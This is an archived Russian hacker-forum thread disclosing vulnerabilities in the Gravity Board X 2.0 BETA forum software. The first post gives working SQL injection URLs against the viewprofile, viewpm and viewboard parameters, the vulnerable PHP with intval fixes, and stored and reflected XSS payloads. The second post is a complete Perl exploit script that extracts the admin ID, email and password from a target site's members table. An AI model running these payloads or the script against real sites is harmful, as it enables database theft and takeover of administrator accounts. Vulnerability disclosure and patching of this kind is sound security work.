Добро пожаловать! Это — архивная версия форумов на «Хакер.Ru». Она работает в режиме read-only.
 

Gravity Board X 2.0 BETA (Public Release 3)

Пользователи, просматривающие топик: none

Зашли как: Guest
Все форумы >> [Уязвимости] >> Gravity Board X 2.0 BETA (Public Release 3)
Имя
Сообщение << Старые топики   Новые топики >>
Gravity Board X 2.0 BETA (Public Release 3) - 2010-02-26 05:42:27.393333   
Ctacok

Сообщений: 38
Оценки: 0
Присоединился: 2009-05-10 13:55:58.663333
Название: Gravity Board X
Офф. сайт: http://www.gravityboardx.com
Версия: 2.0 BETA (Public Release 3)

SQL Иньекция.

quote:

/index.php?action=viewprofile&member_id=-2'+union+select+concat_ws(0x3a,user(),database(),version())+–+


$miquery = mysql_query("SELECT * FROM " . $prefix . "members WHERE memberid = '{$_GET['member_id']}'") OR DIE("Gravity Board X was unable get the member data requested from the members database: " . mysql_error());
Решение:
$member_id = intval($_GET['member_id']); $miquery = mysql_query("SELECT * FROM " . $prefix . "members WHERE memberid = '$member_id'") OR DIE("Gravity Board X was unable get the member data requested from the members database: " . mysql_error());
quote:

index.php?action=viewpm&imid=-1'+union+select+concat_ws(0x3a,user(),database(),version()),2,3,4,5,6,7,8,9,10+–+


$imquery = mysql_query("SELECT * FROM " . $prefix . "ims WHERE imid='{$_GET['imid']}' AND imto='{$_SESSION['memberid']}'", $connection) OR DIE("Gravity Board X was unable to retrieve your personal message from the database: " . mysql_error()); Решение:
$imid = intval($_GET['imid']) $imquery = mysql_query("SELECT * FROM " . $prefix . "ims WHERE imid='$imid' AND imto='{$_SESSION['memberid']}'", $connection) OR DIE("Gravity Board X was unable to retrieve your personal message from the database: " . mysql_error());
quote:

/index.php?action=viewboard&board_id=-2'+union+select+1,concat_ws(0x3a,user(),database(),version()),3+–+



Активная XSS.
/index.php?action=newpm
В поле Message(Сообщение).

quote:

&lt;script&gt;alert();&lt;/script&gt;



/index.php?action=postnew&board_id=[Номер категории]

Имя: Bla
Message:
quote:

&lt;script&gt;alert();&lt;/script&gt;


Пассивная XSS

quote:

/index.php?action=viewthread&thread_id="&gt;&lt;script&gt;alert()&lt;/script&gt;


Источник
Post #: 1
RE: Gravity Board X 2.0 BETA (Public Release 3) - 2010-02-26 13:26:03.986666   
Ctacok

Сообщений: 38
Оценки: 0
Присоединился: 2009-05-10 13:55:58.663333
Опубликовал сплойт Gravity Board X 2.0 BETA (Public Release 3) SQL INJECTION EXPLOIT.

#!/usr/bin/perl use LWP::Simple; print "\n"; print "##############################################################\n"; print "# Gravity Board X 2.0 BETA (Public Release 3) SQL INJECTION #\n"; print "# Author: Ctacok (Russian) #\n"; print "# Blog : www.Ctacok.ru #\n"; print "# Special for Antichat (forum.antichat.ru) and xakep.ru #\n"; print "# Big Thanks to Slip :) #\n"; print "# Require : Magic_quotes = Off #\n"; print "##############################################################\n"; if (@ARGV &lt; 2) { print "\n Usage: exploit.pl [host] [path] "; print "\n EX : exploit.pl www.localhost.com /path/ prefix \n\n"; exit; } $host=$ARGV[0]; $path=$ARGV[1]; $prefix=$ARGV[2]; # PREFIX TABLES, Default: gbx $vuln = "-2'+union+select+concat(0x3a3a3a,memberid,0x3a,email,0x3a,pw,0x3a3a3a)+from+".$prefix."_members"; $doc = get($host.$path."index.php?action=viewprofile&member_id=".$vuln."+--+"); if ($doc =~ /:::(.+):(.+):(.+):::/){ print "\n[+] Admin id: : $1"; print "\n[+] Admin email: $2"; print "\n[+] Admin password: $3"; }
Post #: 2
RE: Gravity Board X 2.0 BETA (Public Release 3) - 2010-04-29 09:23:13.016666   
scj53banking

Сообщений: 255
Оценки: 0
Присоединился: 2010-03-14 21:43:29.030000
спс
Post #: 3
RE: Gravity Board X 2.0 BETA (Public Release 3) - 2010-04-29 18:27:47.136666   
FriLL

Сообщений: 2539
Оценки: 335
Присоединился: 2007-08-11 17:14:26.703333
Тс, а в чем смысл эксплойта, не легче ли просто все через адрессную строку провести?
Post #: 4
RE: Gravity Board X 2.0 BETA (Public Release 3) - 2010-04-29 22:46:26.650000   
FriLL

Сообщений: 2539
Оценки: 335
Присоединился: 2007-08-11 17:14:26.703333

quote:

ORIGINAL: =Carder=

Как говорится любые старания должны потдерживатся ;)

Изобретаем велосипед?
Post #: 5
RE: Gravity Board X 2.0 BETA (Public Release 3) - 2010-05-02 00:39:08.490000   
.::[КОСТЕТ]::.

Сообщений: 1022
Оценки: 0
Присоединился: 2009-02-09 18:35:50.353333
Тоже вариант, но более долгий/возможно сложный.
Post #: 6
Страниц:  [1]
Все форумы >> [Уязвимости] >> Gravity Board X 2.0 BETA (Public Release 3)







Связаться:
Вопросы по сайту / xakep@glc.ru

Предупреждение: использование полученных знаний в противозаконных целях преследуется по закону.